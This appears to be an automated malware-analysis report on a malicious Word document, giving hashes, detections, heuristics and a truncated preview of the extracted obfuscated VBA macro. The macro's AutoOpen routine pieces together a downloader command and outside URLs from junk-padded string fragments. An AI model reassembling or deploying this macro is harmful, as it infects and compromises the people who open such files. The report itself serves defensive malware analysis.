Office (OLE) malware analysis — malicious · 39b2086693d30edc

MALICIOUS

Office (OLE)

137.5 KB Created: 2018-02-08 19:39:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: dbe2c640ac994244da9351d0c63fae67 SHA-1: 5e56463f00fd4d17e20c478451fc5f745f89e8b1 SHA-256: 39b2086693d30edc0e4c8e01f069d17da997945269a72fd2812ca0aca5b406ee

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute arbitrary commands. The ClamAV detection 'Doc.Trojan.Obfuscated-6444812-0' further supports its malicious nature. The obfuscated nature of the VBA code and the lack of clear indicators for a specific family lead to an 'unknown family' classification.

Heuristics 7

ClamAV: Doc.Trojan.Obfuscated-6444812-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Obfuscated-6444812-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26841 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26841 bytes
SHA-256: `143bb2e824fdbc37e257b0649722ca6f103249bd509ede6fa73155a703931f9f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "GLqQfiWzQnjpPa" Sub AutoOpen() On Error Resume Next OlPKSiSrF = PARHSwbwtFunJN - TKtiHSfGRk / (5257924 + jXnGCKrFlh - 3668501 + wmzdKza) cBqwTZJzd = uzXrbvbGwsdR - jmrqjVTC / (9223729 + JzTpZThsM - 2804163 + qhvKXqYXLG) zKsHLciZb = jwjOsHFB - RzQDmsEvjLiu / (5945821 + MLpaiNrwTkEo - 8473552 + hSQlWlu) Application.Run "oFdnJbKACY", uIGzqUruab GhHGOGhCN = PCOUCDjXnvSjfw - ADNOvtXtqFihUT / (1359598 + wFnomdhf - 2860340 + OiqbaBIIODUn) SDrIYOYVL = jlVasJL - VizLfoDOid / (4921190 + EDpInkzi - 1118327 + HtYKBEGAJ) End Sub Function uIGzqUruab() On Error Resume Next qfozu = SaHGszCPi - jwmNkTwwwiTH / (6619927 + jbTzXLjw - 2765336 + olobhOLTEVhzir) GwiioBLTXsB = pzqCrtKrwaRjF - XAmjqZzfVQiXz / (571138 + aitbDiNs - 8922248 + CdtqBQhFbh) rqzUTOSLD = vOrStJcaTU - HfXrYEBKKHsNov / (1134777 + TABRYVrfUBJJY - 7052993 + aBIWOSJrc) dfabMmDmN = vUFiIuozZ + Mid(("zwiVBdvSoUCvRGzuZvVZLjjQL+'+'C7DWC7D+C7DUwqWC'+'7D+gSj+gSjC7DgSj+gSjU+qWC7D+C7DU'+'-obgSj+gSjjeC7D+C7DctChPGW"), 26, 80) JHrYf = UIZRDVlorWXvr - ZoRLjYrWJIYM / (1306498 + dcTzmVDbsJwmka - 5151242 + UhMjzZlpXwwww) aLjXTWIU = tqOnKOCaJ - hzvINtoRvW / (7625484 + zaBEriZnZFdaQ - 1381214 + zPLkuYqwAd) KWcpjFlpl = ciKfCciBrnm - XYAVwcUU / (8475852 + VrBjmtT - 1788578 + AaNBvdtCAwO) iHvmXprw = RXNCBDX + Mid(("CahBjPSkXaMYYIHLqDqfZZbWwiC7gS'Bai"), 27, 5) BpQYschvB = IlWISdTqkih - lfKXErDa / (3725253 + dpljsvazQP - 1414957 + SbinKQjKLj) smdQiJw = YZcdopLquMkI - WmkXPlRSDQNi / (8548286 + hmrIMzHNG - 3037580 + mJFYMIhTw) DRZikAkj = XfLvZPQUJ - uvYiDCEYL / (4867194 + jVFdcLtr - 1515550 + PuAJHjMmhrs) NNPzDfo = jLIoLuCtV + Mid(("lJZVuRZBvzwrPlkBjTrGkjiYlskcwShnKIc7DreC7D+C7DachR9'+'m+R9m(TC7D+C7DMC7DrIi"), 36, 37) RbAujb = SzDWdBj - BXUwWrldiRj / (3973929 + mrkYhDWGVuSz - 5001664 + piUPvRroNGYmNX) nwYQdkPUT = qpHpXfFTwvw - ZjdCwwwww / (2619551 + oDqzidz - 8950733 + waiEKICPjLVTz) hfjCbflA = SIjEaqQ - jdnTlhhaqzB / (1505831 + wBYrquhNn - 8419708 + rzYouZYEZXuB) YpqXOi = AXqkbVJEJIYGrK + Mid(("GYXvaToNhVaTkatpC7D+C7D://wC7D+C7DwC7D+C7Dw.sulC7D+C7DgSjR9m+R9m+gR9'+'StWKSlS"), 15, 57) wsXVcqjwjAZ = THKMkvjNtlFcl - tjQawirE / (9959854 + ATaAESVQ - 286273 + EhjMoJqJ) uTYpIc = QLPkLnc - vVHzPHC / (2314344 + ViIbQpaaE - 2325889 + EmnshDjwkiOMcN) zkGlL = uuNoZjAWnH - YzWpKHb / (6217766 + JhOPMYG - 5270923 + HWjNqujMPmPD) acoVNYb = rWUhIVWSp + Mid(("lzNiTjzkLD+C7DDC7D+C7DCX){trgSj+gSjyC7D+C7D{TC7D+C7DR9m+R9'+'mM1YYUC7DgSj+g'+'Sj+C7D.6MC7D+C7DqDotR9m+R9mC7D+C7DRlWnC7jGrawwjSTklnSZhDSYPCNZZ"), 10, 109) QmljTrHdHC = vNPNfwcBaZoj - ULJbIzroRwth / (5793817 + hojfKAlkzahA - 2835600 + loibTzMTawma) jawWSocV = viRWfBPvM - tdfzjLiuIiFDcS / (3562785 + iWNOitjmp - 1165967 + EBzzrZvkznAd) zSqjwX = sDisJsCw - RWshwLA / (8941066 + JdcdsIjNdhiVa - 5743511 + FViOrczDkBkcG) HMQGNJKqtp = AkjijavYG + Mid(("oKNHmjGI[chAR]39) ) SVjKK"), 9, 12) jXpUvAt = LWJvOVQir - zccjlDQMZsbIf / (5419355 + CzzSfmt - 5116209 + TshjiiT) EKYMiw = tjHhwCwzi - amnCqhrMXSQ / (2219894 + GBWNtVj - 5738935 + ZIOwUWEvzSBHT) pjQwYpHQo = SQCAoVKAChdBj - pEduBiNfntM / (4150557 + cTzJwmND - 9359071 + UuHjYFhTTqcFu) BAWjbuzNCw = bjkCurzf + Mid(("QpOtEEd7D?httR9m+R9m'+'pC'+'7D+C7D:/gSj+gSjC7D+C7D/grC7D+C7DuC7D+CgSj+gSR9m+R9mj7DpC7D'+'+C7Do-CR9m+R9m7'+'D+C7DvC7D+C'+'7Diva.coC7D+C7DmgSj+gSj/C7D+C7DhC7'+'D+gSj+lchdsqhsvlKAz"), 8, 157) jtqhmTzRSB = iOSYsNIztB - ZGasffWYICrCm / (3016476 + jjbtwqAJoF - 4512822 + NhfHNil) FwjaGA = WhvoiLJwV - LjIYdcYzDzZzm / (7487199 + bJqdudTB - 284651 + BknLnjDoAtruoD) katRP = jOfmoYv - jGBTTaJr / (5967233 + acrknQSV - 1729519 + tQjVmZLPoOMY) kLELqCiUn = HGkancIoTNihF + Mid(("wZafKSqolKUzmEjvdiRiVUv[chAR]98+[chAR]80),[chAR]124-CrEplaCE ([chAR]82+[chAR]57+[chAR]109),zRvHbNLXUL"), 24, 68) wrULasLquzT = CMnNbLwaPTTPK - PZjhtOuDQ / (8991606 + WQdjiFl - 9045253 + qEtIKONoZvtJvL) LHSFwND ... (truncated)

SHA-256: 143bb2e824fdbc37e257b0649722ca6f103249bd509ede6fa73155a703931f9f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "GLqQfiWzQnjpPa"
Sub AutoOpen()
On Error Resume Next
OlPKSiSrF = PARHSwbwtFunJN - TKtiHSfGRk / (5257924 + jXnGCKrFlh - 3668501 + wmzdKza)
cBqwTZJzd = uzXrbvbGwsdR - jmrqjVTC / (9223729 + JzTpZThsM - 2804163 + qhvKXqYXLG)
zKsHLciZb = jwjOsHFB - RzQDmsEvjLiu / (5945821 + MLpaiNrwTkEo - 8473552 + hSQlWlu)
Application.Run "oFdnJbKACY", uIGzqUruab
GhHGOGhCN = PCOUCDjXnvSjfw - ADNOvtXtqFihUT / (1359598 + wFnomdhf - 2860340 + OiqbaBIIODUn)
SDrIYOYVL = jlVasJL - VizLfoDOid / (4921190 + EDpInkzi - 1118327 + HtYKBEGAJ)
End Sub
Function uIGzqUruab()
On Error Resume Next
qfozu = SaHGszCPi - jwmNkTwwwiTH / (6619927 + jbTzXLjw - 2765336 + olobhOLTEVhzir)
GwiioBLTXsB = pzqCrtKrwaRjF - XAmjqZzfVQiXz / (571138 + aitbDiNs - 8922248 + CdtqBQhFbh)
rqzUTOSLD = vOrStJcaTU - HfXrYEBKKHsNov / (1134777 + TABRYVrfUBJJY - 7052993 + aBIWOSJrc)
dfabMmDmN = vUFiIuozZ + Mid(("zwiVBdvSoUCvRGzuZvVZLjjQL+'+'C7DWC7D+C7DUwqWC'+'7D+gSj+gSjC7DgSj+gSjU+qWC7D+C7DU'+'-obgSj+gSjjeC7D+C7DctChPGW"), 26, 80)
JHrYf = UIZRDVlorWXvr - ZoRLjYrWJIYM / (1306498 + dcTzmVDbsJwmka - 5151242 + UhMjzZlpXwwww)
aLjXTWIU = tqOnKOCaJ - hzvINtoRvW / (7625484 + zaBEriZnZFdaQ - 1381214 + zPLkuYqwAd)
KWcpjFlpl = ciKfCciBrnm - XYAVwcUU / (8475852 + VrBjmtT - 1788578 + AaNBvdtCAwO)
iHvmXprw = RXNCBDX + Mid(("CahBjPSkXaMYYIHLqDqfZZbWwiC7gS'Bai"), 27, 5)
BpQYschvB = IlWISdTqkih - lfKXErDa / (3725253 + dpljsvazQP - 1414957 + SbinKQjKLj)
smdQiJw = YZcdopLquMkI - WmkXPlRSDQNi / (8548286 + hmrIMzHNG - 3037580 + mJFYMIhTw)
DRZikAkj = XfLvZPQUJ - uvYiDCEYL / (4867194 + jVFdcLtr - 1515550 + PuAJHjMmhrs)
NNPzDfo = jLIoLuCtV + Mid(("lJZVuRZBvzwrPlkBjTrGkjiYlskcwShnKIc7DreC7D+C7DachR9'+'m+R9m(TC7D+C7DMC7DrIi"), 36, 37)
RbAujb = SzDWdBj - BXUwWrldiRj / (3973929 + mrkYhDWGVuSz - 5001664 + piUPvRroNGYmNX)
nwYQdkPUT = qpHpXfFTwvw - ZjdCwwwww / (2619551 + oDqzidz - 8950733 + waiEKICPjLVTz)
hfjCbflA = SIjEaqQ - jdnTlhhaqzB / (1505831 + wBYrquhNn - 8419708 + rzYouZYEZXuB)
YpqXOi = AXqkbVJEJIYGrK + Mid(("GYXvaToNhVaTkatpC7D+C7D://wC7D+C7DwC7D+C7Dw.sulC7D+C7DgSjR9m+R9m+gR9'+'StWKSlS"), 15, 57)
wsXVcqjwjAZ = THKMkvjNtlFcl - tjQawirE / (9959854 + ATaAESVQ - 286273 + EhjMoJqJ)
uTYpIc = QLPkLnc - vVHzPHC / (2314344 + ViIbQpaaE - 2325889 + EmnshDjwkiOMcN)
zkGlL = uuNoZjAWnH - YzWpKHb / (6217766 + JhOPMYG - 5270923 + HWjNqujMPmPD)
acoVNYb = rWUhIVWSp + Mid(("lzNiTjzkLD+C7DDC7D+C7DCX){trgSj+gSjyC7D+C7D{TC7D+C7DR9m+R9'+'mM1YYUC7DgSj+g'+'Sj+C7D.6MC7D+C7DqDotR9m+R9mC7D+C7DRlWnC7jGrawwjSTklnSZhDSYPCNZZ"), 10, 109)
QmljTrHdHC = vNPNfwcBaZoj - ULJbIzroRwth / (5793817 + hojfKAlkzahA - 2835600 + loibTzMTawma)
jawWSocV = viRWfBPvM - tdfzjLiuIiFDcS / (3562785 + iWNOitjmp - 1165967 + EBzzrZvkznAd)
zSqjwX = sDisJsCw - RWshwLA / (8941066 + JdcdsIjNdhiVa - 5743511 + FViOrczDkBkcG)
HMQGNJKqtp = AkjijavYG + Mid(("oKNHmjGI[chAR]39) ) SVjKK"), 9, 12)
jXpUvAt = LWJvOVQir - zccjlDQMZsbIf / (5419355 + CzzSfmt - 5116209 + TshjiiT)
EKYMiw = tjHhwCwzi - amnCqhrMXSQ / (2219894 + GBWNtVj - 5738935 + ZIOwUWEvzSBHT)
pjQwYpHQo = SQCAoVKAChdBj - pEduBiNfntM / (4150557 + cTzJwmND - 9359071 + UuHjYFhTTqcFu)
BAWjbuzNCw = bjkCurzf + Mid(("QpOtEEd7D?httR9m+R9m'+'pC'+'7D+C7D:/gSj+gSjC7D+C7D/grC7D+C7DuC7D+CgSj+gSR9m+R9mj7DpC7D'+'+C7Do-CR9m+R9m7'+'D+C7DvC7D+C'+'7Diva.coC7D+C7DmgSj+gSj/C7D+C7DhC7'+'D+gSj+lchdsqhsvlKAz"), 8, 157)
jtqhmTzRSB = iOSYsNIztB - ZGasffWYICrCm / (3016476 + jjbtwqAJoF - 4512822 + NhfHNil)
FwjaGA = WhvoiLJwV - LjIYdcYzDzZzm / (7487199 + bJqdudTB - 284651 + BknLnjDoAtruoD)
katRP = jOfmoYv - jGBTTaJr / (5967233 + acrknQSV - 1729519 + tQjVmZLPoOMY)
kLELqCiUn = HGkancIoTNihF + Mid(("wZafKSqolKUzmEjvdiRiVUv[chAR]98+[chAR]80),[chAR]124-CrEplaCE ([chAR]82+[chAR]57+[chAR]109),zRvHbNLXUL"), 24, 68)
wrULasLquzT = CMnNbLwaPTTPK - PZjhtOuDQ / (8991606 + WQdjiFl - 9045253 + qEtIKONoZvtJvL)
LHSFwND
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.